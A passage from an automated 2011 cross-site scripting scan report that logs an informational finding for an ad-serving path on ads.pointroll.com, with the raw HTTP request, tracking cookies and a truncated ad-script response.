P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:29:48 GMT
Pragma: no-cache
Content-Length: 5897
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...

26.2. http://ads.pointroll.com/PortalServe/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

GET /PortalServe/?pid=1394840Y52120110823224152&time=2|12:45|-5&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&r=0.34970951941795647 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:45:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1394840' src='http://ads.pointroll.com/PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0
...[SNIP]...

Report generated by XSS.Cx at Tue Sep 06 11:57:40 GMT-06:00 2011.